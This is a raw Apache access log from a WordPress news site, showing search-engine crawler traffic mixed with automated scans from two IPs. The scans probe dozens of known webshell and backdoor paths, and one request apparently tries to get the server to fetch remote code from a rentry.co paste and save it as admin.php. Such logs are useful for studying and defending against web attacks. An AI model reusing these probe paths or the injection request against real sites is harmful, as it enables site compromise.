17.246.19.4 - - [19/Oct/2025:12:02:36 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoginMobile.js?ver=12.7.1 HTTP/1.1" 200 6347 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.250 - - [19/Oct/2025:12:02:36 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbSearch.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 5945 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.119 - - [19/Oct/2025:12:02:37 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdAjaxSearch.js?ver=12.7.1 HTTP/1.1" 200 6145 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.50 - - [19/Oct/2025:12:02:37 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbMenu.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 10781 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.227 - - [19/Oct/2025:12:02:38 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdMenu.js?ver=12.7.1 HTTP/1.1" 200 4530 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.189 - - [19/Oct/2025:12:02:38 -0400] "GET /wp-includes/js/comment-reply.min.js?ver=6.8.3 HTTP/1.1" 200 3026 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.106 - - [19/Oct/2025:12:02:39 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.3 HTTP/1.1" 200 19251 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.24.219.78 - - [19/Oct/2025:12:02:53 -0400] "GET / HTTP/1.1" 200 201202 "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:55 -0400] "GET //rindex.php?action=add¶meter=admin.php%7Chttps://rentry.co/3fpi77xv/raw HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:55 -0400] "GET /rindex.php?action=add¶meter=admin.php%7Chttps://rentry.co/3fpi77xv/raw HTTP/1.1" 404 136514 "http://wahgazab.com//rindex.php?action=add¶meter=admin.php%7Chttps://rentry.co/3fpi77xv/raw" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:56 -0400] "GET //admin.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:56 -0400] "GET /admin.php HTTP/1.1" 404 136514 "http://wahgazab.com//admin.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:57 -0400] "GET //phpmailer.lang-sv.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:58 -0400] "GET /phpmailer.lang-sv.php HTTP/1.1" 404 136514 "http://wahgazab.com//phpmailer.lang-sv.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:58 -0400] "GET //ioxi02.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:02:59 -0400] "GET /ioxi02.php HTTP/1.1" 404 136514 "http://wahgazab.com//ioxi02.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:00 -0400] "GET //css/index.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:01 -0400] "GET /css/ HTTP/1.1" 404 136514 "http://wahgazab.com//css/index.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:02 -0400] "GET //wp-content/index.php HTTP/1.1" 200 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:02 -0400] "GET //wp-content/json.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:03 -0400] "GET /wp-content/json.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/json.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:04 -0400] "GET //chosen.php?p= HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:04 -0400] "GET /chosen.php HTTP/1.1" 404 136514 "http://wahgazab.com//chosen.php?p=" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:06 -0400] "GET //wp-content/themes/travel/issue.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:06 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/themes/travel/issue.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:07 -0400] "GET //shell20211028.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:08 -0400] "GET /shell20211028.php HTTP/1.1" 404 136514 "http://wahgazab.com//shell20211028.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:09 -0400] "GET //wp-content/plugins/classic-editor/wp-login.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:10 -0400] "GET /wp-content/plugins/classic-editor/wp-login.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/plugins/classic-editor/wp-login.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:11 -0400] "GET //cjfuns.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
52.200.54.136 - - [19/Oct/2025:12:03:11 -0400] "GET /the-biggest-crocodiles-in-the-world-found-here/ HTTP/1.1" 200 280158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.24.219.78 - - [19/Oct/2025:12:03:12 -0400] "GET /cjfuns.php HTTP/1.1" 404 136514 "http://wahgazab.com//cjfuns.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:13 -0400] "GET //mah.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:13 -0400] "GET /mah.php HTTP/1.1" 404 136514 "http://wahgazab.com//mah.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:15 -0400] "GET //wp-content/admin.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
52.1.157.90 - - [19/Oct/2025:12:03:15 -0400] "GET /tag/palace-on-wheels-route/ HTTP/1.1" 200 121997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.24.219.78 - - [19/Oct/2025:12:03:15 -0400] "GET /wp-content/admin.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/admin.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:16 -0400] "GET //images/plugins.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:17 -0400] "GET /images/plugins.php HTTP/1.1" 404 136514 "http://wahgazab.com//images/plugins.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:18 -0400] "GET //wp-content/epinyins.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:19 -0400] "GET /wp-content/epinyins.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/epinyins.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:20 -0400] "GET //wp-admin/js/widgets/moon.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:21 -0400] "GET /wp-admin/js/widgets/moon.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/js/widgets/moon.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:22 -0400] "GET //wp-admin/js/widgets/file.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:23 -0400] "GET /wp-admin/js/widgets/file.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/js/widgets/file.php" "Go-http-client/1.1"
23.21.148.226 - - [19/Oct/2025:12:03:23 -0400] "GET /walking-of-devotees-in-shirdi-sai-temple-will-produce-electricity/ HTTP/1.1" 200 283114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.24.219.78 - - [19/Oct/2025:12:03:24 -0400] "GET //radio.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:24 -0400] "GET /radio.php HTTP/1.1" 404 136514 "http://wahgazab.com//radio.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:26 -0400] "GET //wp-includes/widgets/include.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:26 -0400] "GET /wp-includes/widgets/include.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-includes/widgets/include.php#admin" "Go-http-client/1.1"
54.80.185.200 - - [19/Oct/2025:12:03:26 -0400] "GET /this-snake-caught-in-the-trap-of-a-spider/ HTTP/1.1" 200 278978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.24.219.78 - - [19/Oct/2025:12:03:27 -0400] "GET //moon.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:28 -0400] "GET /moon.php HTTP/1.1" 404 136514 "http://wahgazab.com//moon.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:29 -0400] "GET //wp-includes/IXR/about.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:30 -0400] "GET /wp-includes/IXR/about.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-includes/IXR/about.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:31 -0400] "GET //shell.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:32 -0400] "GET /shell.php HTTP/1.1" 404 136514 "http://wahgazab.com//shell.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:33 -0400] "GET //class.api.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:33 -0400] "GET /class.api.php HTTP/1.1" 404 136514 "http://wahgazab.com//class.api.php#888xyz999" "Go-http-client/1.1"
66.249.79.168 - - [19/Oct/2025:12:03:33 -0400] "GET /hindu-muslim-worship-together-at-this-temple/kadapa4_1460385232/feed/ HTTP/1.1" 200 858 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.78 - - [19/Oct/2025:12:03:35 -0400] "GET //wp-admin/images/class.api.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:35 -0400] "GET /wp-admin/images/class.api.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/images/class.api.php#888xyz999" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:36 -0400] "GET //wp-admin/js/widgets/class.api.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:37 -0400] "GET /wp-admin/js/widgets/class.api.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/js/widgets/class.api.php#888xyz999" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:38 -0400] "GET //wp-content/languages/themes/class.api.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:39 -0400] "GET /wp-content/languages/themes/class.api.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/languages/themes/class.api.php#888xyz999" "Go-http-client/1.1"
178.171.25.158 - - [19/Oct/2025:12:03:39 -0400] "GET /wp-content/uploads/2016/10/muslim-women-karva-chauth.jpg HTTP/1.1" 200 83562 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
216.24.219.78 - - [19/Oct/2025:12:03:40 -0400] "GET //atomlib.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:41 -0400] "GET /atomlib.php HTTP/1.1" 404 136514 "http://wahgazab.com//atomlib.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:42 -0400] "GET //.well-known/index.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:42 -0400] "GET /.well-known/ HTTP/1.1" 200 795 "http://wahgazab.com//.well-known/index.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:43 -0400] "GET //.well-known/acme-challenge/wp-login.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:43 -0400] "GET /.well-known/acme-challenge/wp-login.php HTTP/1.1" 404 136514 "http://wahgazab.com//.well-known/acme-challenge/wp-login.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:45 -0400] "GET //wp-admin/network/plugins.php HTTP/1.1" 302 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:45 -0400] "GET /wp-login.php?redirect_to=http%3A%2F%2Fwahgazab.com%2F%2Fwp-admin%2Fnetwork%2Fplugins.php&reauth=1 HTTP/1.1" 200 5435 "http://wahgazab.com//wp-admin/network/plugins.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:46 -0400] "GET //wp-content/shell20211028.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:47 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/shell20211028.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:48 -0400] "GET //cgi-bin/moon.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:49 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 404 136514 "http://wahgazab.com//cgi-bin/moon.php" "Go-http-client/1.1"
216.24.219.78 - - [19/Oct/2025:12:03:50 -0400] "GET //wp-admin/includes/file.php HTTP/1.1" 500 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:51 -0400] "GET //wp-content/moderation.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:52 -0400] "GET /wp-content/moderation.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/moderation.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:53 -0400] "GET //css/iR7SzrsOUEP.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:54 -0400] "GET /css/iR7SzrsOUEP.php HTTP/1.1" 404 136514 "http://wahgazab.com//css/iR7SzrsOUEP.php#xleet" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:55 -0400] "GET //xxl.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:56 -0400] "GET /xxl.php HTTP/1.1" 404 136514 "http://wahgazab.com//xxl.php#xleet" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:57 -0400] "GET //wp-admin/css/wp-login.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:58 -0400] "GET /wp-admin/css/wp-login.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/css/wp-login.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:03:59 -0400] "GET //wp-blog.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:00 -0400] "GET /wp-blog.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-blog.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:01 -0400] "GET //wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:01 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/plugins/linkpreview/db.php?u" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:03 -0400] "GET //cong.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
3.218.35.239 - - [19/Oct/2025:12:04:03 -0400] "GET /tag/palace-on-wheels-package/ HTTP/1.1" 200 122013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
104.234.19.97 - - [19/Oct/2025:12:04:03 -0400] "GET /cong.php HTTP/1.1" 404 136514 "http://wahgazab.com//cong.php#935" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:05 -0400] "GET //admin.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:05 -0400] "GET /admin.php HTTP/1.1" 404 136514 "http://wahgazab.com//admin.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:06 -0400] "GET //wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
18.142.166.146 - - [19/Oct/2025:12:04:07 -0400] "GET /wp-content/uploads/2017/07/hidden-meanings-of-the-colors-related-to-the-religions-4.jpg HTTP/1.1" 200 90966 "-" "Mozilla/5.0 (compatible; crawler)"
104.234.19.97 - - [19/Oct/2025:12:04:07 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/plugins/pwnd/pwnd.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:08 -0400] "GET //wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.73.216.135 - - [19/Oct/2025:12:04:09 -0400] "GET /brilliant-bollywood-actor-rajesh-vivek-passed-away/rajesh-vivek2/feed HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.234.19.97 - - [19/Oct/2025:12:04:09 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/plugins/pwnd-1/pwnd.php" "Go-http-client/1.1"
216.73.216.135 - - [19/Oct/2025:12:04:09 -0400] "GET /brilliant-bollywood-actor-rajesh-vivek-passed-away/rajesh-vivek2/feed/ HTTP/1.1" 200 855 "http://wahgazab.com/brilliant-bollywood-actor-rajesh-vivek-passed-away/rajesh-vivek2/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.79.168 - - [19/Oct/2025:12:04:10 -0400] "GET /?a=99988167120003&channel=e1467d&from=pin.php%3Fid%3D1671200-1245%26name%3D%E3%82%AB%E3%83%90%E3%83%BC%E3%82%AA%E3%83%BC%E3%83%AB+%E7%8A%AC%E6%9C%8D+%E4%B8%AD%E5%9E%8B%E7%8A%AC+%E5%A4%A7%E5%9E%8B%E7%8A%AC+%E3%83%89%E3%83%83%E3%82%B0%E3%82%A6%E3%82%A7%E3%82%A2+%E3%82%B3%E3%83%83%E3%83%88%E3%83%B3+%E7%B6%BF+%E3%82%AA%E3%83%BC%E3%83%AB%E3%82%A4%E3%83%B3%E3%83%AF%E3%83%B3+%E9%95%B7%E8%A2%96+%E3%83%89%E3%83%83%E3%82%B0%E6%9C%8D+%E4%BC%B8%E7%B8%AE%E6%80%A7+%E3%82%B9%E3%83%88%E3%83%AC%E3%83%83%E3%83%81+%E3%83%A1%E3%82%B9+%E3%82%AA%E3%82%B9+%E7%8A%AC%E3%82%A6%E3%82%A7%E3%82%A2+%E3%81%84%E3%81%AC+%E3%83%9A%E3%83%83%E3%83%88%E6%9C%8D++%E6%B1%9A%E3%82%8C%E9%98%B2%E6%AD%A2+%E5%82%B7%E3%81%AA%E3%82%81%E9%98%B2%E6%AD%A2+%E6%8A%9C%E3%81%91%E6%AF%9B%E5%AF%BE%E7%AD%96+%E9%98%B2%E5%AF%92%E5%AF%BE%E7%AD%96+%E9%96%A2%E7%AF%80%E4%BF%9D%E8%AD%B7+%E3%81%8B%E3%82%8F%E3%81%84%E3%81%84 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:12:04:10 -0400] "GET /learn-few-usage-of-salt/flower HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:04:10 -0400] "GET /learn-few-usage-of-salt/rasa-spa-august/feed HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.234.19.97 - - [19/Oct/2025:12:04:10 -0400] "GET //wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.73.216.135 - - [19/Oct/2025:12:04:10 -0400] "GET /learn-few-usage-of-salt/flower/ HTTP/1.1" 200 121866 "http://wahgazab.com/learn-few-usage-of-salt/flower" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:04:11 -0400] "GET /learn-few-usage-of-salt/rasa-spa-august/feed/ HTTP/1.1" 200 804 "http://wahgazab.com/learn-few-usage-of-salt/rasa-spa-august/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.234.19.97 - - [19/Oct/2025:12:04:11 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/plugins/wp-help/admin/wp-fclass.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:12 -0400] "GET //xxc.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:13 -0400] "GET /xxc.php HTTP/1.1" 404 136514 "http://wahgazab.com//xxc.php" "Go-http-client/1.1"
104.234.19.97 - - [19/Oct/2025:12:04:14 -0400] "GET //wp-login.php HTTP/1.1" 200 5415 "-" "Go-http-client/1.1"
173.252.70.23 - - [19/Oct/2025:12:04:27 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
44.213.36.21 - - [19/Oct/2025:12:04:27 -0400] "GET /tag/singapore-news/ HTTP/1.1" 200 122609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.70.138.176 - - [19/Oct/2025:12:04:35 -0400] "GET /tag/these-are-the-android-apps-that-kill-your-battery/ HTTP/1.1" 200 122641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
173.252.87.114 - - [19/Oct/2025:12:04:40 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
52.0.41.164 - - [19/Oct/2025:12:04:43 -0400] "GET /tag/give-your-daughter/ HTTP/1.1" 200 121759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.223.134.5 - - [19/Oct/2025:12:04:47 -0400] "GET /tag/unknown-places/ HTTP/1.1" 200 121661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.135 - - [19/Oct/2025:12:04:47 -0400] "GET /srk-son-abram-just-steals-the-show/collage_650_040915094841 HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
92.222.108.112 - - [19/Oct/2025:12:04:48 -0400] "GET /tag/hrithik-roshan-is-in-trouble-again-for-his-tweet-on-affair-with-pope/ HTTP/1.1" 200 122179 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.135 - - [19/Oct/2025:12:04:48 -0400] "GET /srk-son-abram-just-steals-the-show/collage_650_040915094841/ HTTP/1.1" 200 121721 "http://wahgazab.com/srk-son-abram-just-steals-the-show/collage_650_040915094841" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:04:48 -0400] "GET /get-to-know-about-jesus-christ-and-his-teachings-on-this-good-friday/jesus1-2 HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:04:49 -0400] "GET /get-to-know-about-jesus-christ-and-his-teachings-on-this-good-friday/jesus1-2/ HTTP/1.1" 200 121762 "http://wahgazab.com/get-to-know-about-jesus-christ-and-his-teachings-on-this-good-friday/jesus1-2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
98.83.8.142 - - [19/Oct/2025:12:05:12 -0400] "GET /tag/latest-news-on-tobacco-ban-news/ HTTP/1.1" 200 122254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.219.80.71 - - [19/Oct/2025:12:05:31 -0400] "GET /bhabhi-ji-can-get-married-soon/ HTTP/1.1" 200 276540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
